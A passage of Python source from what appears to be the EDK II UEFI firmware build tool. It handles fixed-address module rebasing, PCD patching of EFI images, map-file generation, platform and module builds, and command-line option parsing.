if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add funtion address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.write('%s' % (Line))
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
IsIpfPlatform = False
if 'IPF' in self.ArchList:
IsIpfPlatform = True
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
RtModuleList[Module.MetaFile] = ImageInfo
#IPF runtime driver needs to be at 2 page alignment.
if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
# Make IPF runtime driver at 2 page alignment.
if IsIpfPlatform:
ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
RtSize = RtSize + ReservedRuntimeMemorySize
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize / 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize / 0x1000))
MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize / 0x1000))
MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize / 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize / 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.write('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
MapBuffer.close()
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
self.Progress.Stop("done!")
MaList = []
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None: continue
MaList.append(Ma)
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
self.Progress.Start("Generating code")
Ma.CreateCodeFile(True)
self.Progress.Stop("done!")
if self.Target == "genc":
return True
if not self.SkipAutoGen or self.Target == 'genmake':
self.Progress.Start("Generating makefile")
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
self.Progress.Stop("done!")
if self.Target == "genmake":
return True
self.BuildModules.append(Ma)
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
self.MakeTime += int(round((time.time() - MakeContiue)))
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
GenFdsStart = time.time()
self._Build("fds", Wa)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self):
# convert dictionary of Cmd:(Inf,Arch)
# to a new dictionary of (Inf,Arch):Cmd,Cmd,Cmd...
CmdSetDict = defaultdict(set)
GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, self.ArchList, GlobalData)
for Cmd in GenFfsDict:
tmpInf, tmpArch = GenFfsDict[Cmd]
CmdSetDict[tmpInf, tmpArch].add(Cmd)
return CmdSetDict
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa is None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser is not None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
self.Progress.Stop("done!")
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
#
# Save temp tables to a TmpTableDict.
#
for Key in Wa.BuildDatabase._CACHE_:
if Wa.BuildDatabase._CACHE_[Key]._RawData and Wa.BuildDatabase._CACHE_[Key]._RawData._Table and Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table:
if TemporaryTablePattern.match(Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table):
TmpTableDict[Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table] = Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Cur
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
self.MakeTime += int(round((time.time() - MakeContiue)))
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
GenFdsStart = time.time()
LaunchCommand(Wa.GenFdsCommand, os.getcwd())
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print >> toolsFile, ' '.join(guidedSectionTool)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
self.Db.Close()
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
for Module in self.HashSkipModules:
Module.CreateAsBuiltInf(True)
self.BuildModules = []
self.HashSkipModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
#self.DumpBuildData()
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def DumpBuildData(self):
CacheDirectory = os.path.dirname(GlobalData.gDatabasePath)
Utils.CreateDirectory(CacheDirectory)
Utils.DataDump(Utils.gFileTimeStampCache, os.path.join(CacheDirectory, "gFileTimeStampCache"))
Utils.DataDump(Utils.gDependencyDatabase, os.path.join(CacheDirectory, "gDependencyDatabase"))
def RestoreBuildData(self):
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gFileTimeStampCache")
if Utils.gFileTimeStampCache == {} and os.path.isfile(FilePath):
Utils.gFileTimeStampCache = Utils.DataRestore(FilePath)
if Utils.gFileTimeStampCache is None:
Utils.gFileTimeStampCache = {}
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gDependencyDatabase")
if Utils.gDependencyDatabase == {} and os.path.isfile(FilePath):
Utils.gDependencyDatabase = Utils.DataRestore(FilePath)
if Utils.gDependencyDatabase is None:
Utils.gDependencyDatabase = {}
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList is not None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
def LogBuildTime(Time):
if Time:
TimeDurStr = ''
TimeDur = time.gmtime(Time)
if TimeDur.tm_yday > 1:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur) + ", %d day(s)" % (TimeDur.tm_yday - 1)
else:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur)
return TimeDurStr
else:
return None
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'IPF', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
